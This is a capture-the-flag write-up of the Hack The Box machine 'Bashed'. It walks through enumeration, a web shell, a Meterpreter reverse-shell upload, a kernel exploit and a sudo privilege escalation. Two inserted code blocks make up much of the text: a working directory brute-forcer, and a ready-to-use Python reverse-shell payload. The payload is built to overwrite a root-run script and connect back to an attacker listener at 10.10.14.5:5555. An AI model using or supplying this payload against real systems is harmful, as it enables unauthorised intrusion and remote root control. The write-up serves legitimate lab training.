Thursday, March 21, 2019

Bashed


BASHED

- Layout for this exercise:





1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Bashed, which is a retired machine from the Hack The Box pentesting platform:

https://www.hackthebox.eu


2 - ENUMERATION

Bashed's IP is 10.10.10.68:

 

- Scanning with Nmap, the only open port is 80:



- A deeper scan of port 80 (service and version detection, default scripts):


- Connecting with the browser:

 


- Dirbusting:






- Checking the folder /dev we find two PHP scripts:
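The dirbusting step above is what finds /dev and the two PHP scripts in it. The following is an added example (not code from the original write-up) of what a directory brute-forcer does: it probes a wordlist of directory names under a base URL, keeps every path that does not answer 404, and then probes a file wordlist inside each directory found. It runs against a throwaway local HTTP server whose layout mimics the target (a /dev directory holding phpbash.php and phpbash.min.php); the server, the wordlists and the layout are all constructed for this example.

```python
"""Minimal directory brute-forcer, run against a constructed local target."""
import os
import shutil
import tempfile
import threading
import urllib.error
import urllib.request
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

# Constructed mini wordlists; a real run uses a dirb/SecLists list of thousands of entries.
DIR_WORDS = ["images", "css", "js", "uploads", "dev", "php", "config"]
FILE_WORDS = ["index.php", "phpbash.php", "phpbash.min.php", "shell.php"]


def probe(url, timeout=3):
    """Return the HTTP status for url, or None when it is a 404 or unreachable."""
    req = urllib.request.Request(url, method="HEAD")  # HEAD: no body transfer needed
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return None if exc.code == 404 else exc.code  # 401/403 still reveal a path exists
    except urllib.error.URLError:
        return None


def brute_force(base_url, words, suffix="/"):
    """Try every word under base_url; return {word: status} for non-404 answers."""
    hits = {}
    for word in words:
        status = probe(f"{base_url.rstrip('/')}/{word}{suffix}")
        if status is not None:
            hits[word] = status
    return hits


class QuietHandler(SimpleHTTPRequestHandler):
    """Directory-listing file server that does not log every request to stderr."""

    def log_message(self, *args):
        pass


def start_target_server(layout):
    """Serve a temp tree described by layout ({dir: [files]}) on a random local port."""
    root = tempfile.mkdtemp(prefix="bashed-demo-")
    for directory, files in layout.items():
        os.makedirs(os.path.join(root, directory), exist_ok=True)
        for name in files:
            with open(os.path.join(root, directory, name), "w") as fh:
                fh.write("<?php /* placeholder */ ?>\n")
    server = ThreadingHTTPServer(("127.0.0.1", 0), partial(QuietHandler, directory=root))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, root, f"http://127.0.0.1:{server.server_address[1]}"


def demo():
    """Two-pass enumeration (directories, then files inside each) against the constructed target."""
    layout = {"dev": ["phpbash.php", "phpbash.min.php"], "uploads": [], "images": []}
    server, root, base = start_target_server(layout)
    try:
        dirs = brute_force(base, DIR_WORDS)
        files = {d: brute_force(f"{base}/{d}", FILE_WORDS, suffix="") for d in dirs}
    finally:
        server.shutdown()
        server.server_close()
        shutil.rmtree(root, ignore_errors=True)
    return dirs, files


if __name__ == "__main__":
    found_dirs, found_files = demo()
    print("directories:", found_dirs)
    print("files:", found_files)
```

Only 404 is treated as "absent": a 403 on a directory is still a hit, because it tells you the path exists even though listing is denied, which is exactly the kind of lead worth following up by hand.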

 

- Opening either phpbash.php or phpbash.min.php gives a web-based bash shell (phpbash) that executes commands on the server:

 







- Looking for more content:

 

- Good news: Netcat is available on the box:

 


3 - EXPLOITATION


- Msfvenom generates a PHP Meterpreter reverse shell payload called myshell.php:




- Uploading myshell.php from Kali to Bashed:


 

 


- Setting up a Meterpreter listener session:




- Running myshell.php from the browser:

 

- The exploitation is successful and we get a Meterpreter session:



- Spawning a shell from the Meterpreter session and upgrading it to a fully interactive one:

 


4 - CAPTURING THE 1st FLAG

- Reading user.txt:

 


5 - PRIVILEGE ESCALATION

- Let's try two ways of achieving privilege escalation:

5.1 - Exploiting the kernel

- Checking the Ubuntu release version:




- A public kernel exploit for this release (kernel exploits can crash the target, so this is the riskier of the two routes):









- Copying the exploit poc.c to Kali and compiling it according to the instructions:








- Transferring the binary pwn from Kali to Bashed:




- Giving execution permissions:




- Running pwn we eventually get a remote root shell:





5.2 - Sudoer privileges

- The current user is www-data:

 

- The sudoers rules for www-data allow it to run any command as the scriptmanager user:

 




- Listing content inside folder /scriptmanager:



- Listing content of / there is a folder called scripts:



- User www-data cannot directly access the contents of the scripts folder:

 

- However, www-data can use its sudo privileges to list scripts as scriptmanager:



- Reading test.py and test.txt:

 

 


- At this point the strategy is to replace test.py with code of our own, for instance a reverse shell:




- Transferring myexploit.py to Bashed:



- Copying myexploit.py over test.py:




- Setting a Netcat listener session on Kali's port 5555:




- After a few seconds the replaced test.py is executed as root and a root shell connects back to the listener:
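The steps above (write a reverse shell, copy it over test.py, listen with Netcat, wait for whatever executes test.py as root to run it) are put together below as an added example; it is not the write-up's own myexploit.py. `payload_source()` renders the stand-alone script that would be dropped over test.py (the listener host and port are parameters; the 10.10.14.5 address in the usage line is an assumed attacker address), and `reverse_shell()` implements the same connect-back logic in-process so that `demo()` can prove it works against a constructed local stand-in for the `nc -lvp 5555` listener, without any network beyond loopback.

```python
"""Python reverse shell payload plus a local harness that exercises it."""
import socket
import subprocess
import threading

# Stand-alone script of the kind written over /scripts/test.py: connect back,
# point fds 0/1/2 at the socket, hand them to an interactive /bin/sh.
PAYLOAD_TEMPLATE = '''import os, socket, subprocess
s = socket.socket()
s.connect(("{host}", {port}))
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)
subprocess.call(["/bin/sh", "-i"])
'''


def payload_source(host, port):
    """Render the drop-in script for a given listener address."""
    return PAYLOAD_TEMPLATE.format(host=host, port=int(port))


def reverse_shell(host, port, shell="/bin/sh"):
    """Connect back to host:port and wire an interactive shell to the socket.

    Equivalent to the dup2/exec payload above, but using Popen so the calling
    process survives and can report the shell's exit status.
    """
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.setblocking(True)  # a timeout leaves the fd non-blocking, which breaks sh's reads
        proc = subprocess.Popen([shell, "-i"], stdin=sock, stdout=sock, stderr=sock)
        return proc.wait()


def run_listener(ready, result, commands):
    """Constructed stand-in for `nc -lvp <port>`: accept one shell, feed it commands, collect output."""
    with socket.socket() as srv:
        srv.bind(("127.0.0.1", 0))  # ephemeral port; a real listener uses the port given to the payload
        srv.listen(1)
        srv.settimeout(10)
        ready["port"] = srv.getsockname()[1]
        ready["event"].set()
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(10)
            conn.sendall(commands.encode())
            chunks = []
            while True:
                data = conn.recv(4096)
                if not data:  # shell exited and the far end closed the socket
                    break
                chunks.append(data)
    result["output"] = b"".join(chunks).decode(errors="replace")


def demo():
    """Start the fake listener, fire the payload at it, return (exit code, shell output)."""
    ready = {"event": threading.Event()}
    result = {}
    listener = threading.Thread(
        target=run_listener,
        args=(ready, result, "echo pwned-$((6*7))\nexit\n"),  # constructed commands
        daemon=True,
    )
    listener.start()
    ready["event"].wait(5)
    rc = reverse_shell("127.0.0.1", ready["port"])
    listener.join(10)
    return rc, result.get("output", "")


if __name__ == "__main__":
    print(payload_source("10.10.14.5", 5555))  # assumed attacker host; what goes into test.py
    code, output = demo()
    print("shell exit code:", code)
    print("listener saw:", output)
```

Because the shell's stdin is the socket, anything the listener types is executed by whichever user ran test.py; that is why a scheduled run as root turns a world-overwritable script into a root shell, and why the fix on the defender's side is file ownership and permissions on /scripts rather than anything in the script itself.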





6 - CAPTURING THE 2nd FLAG

- Reading root.txt: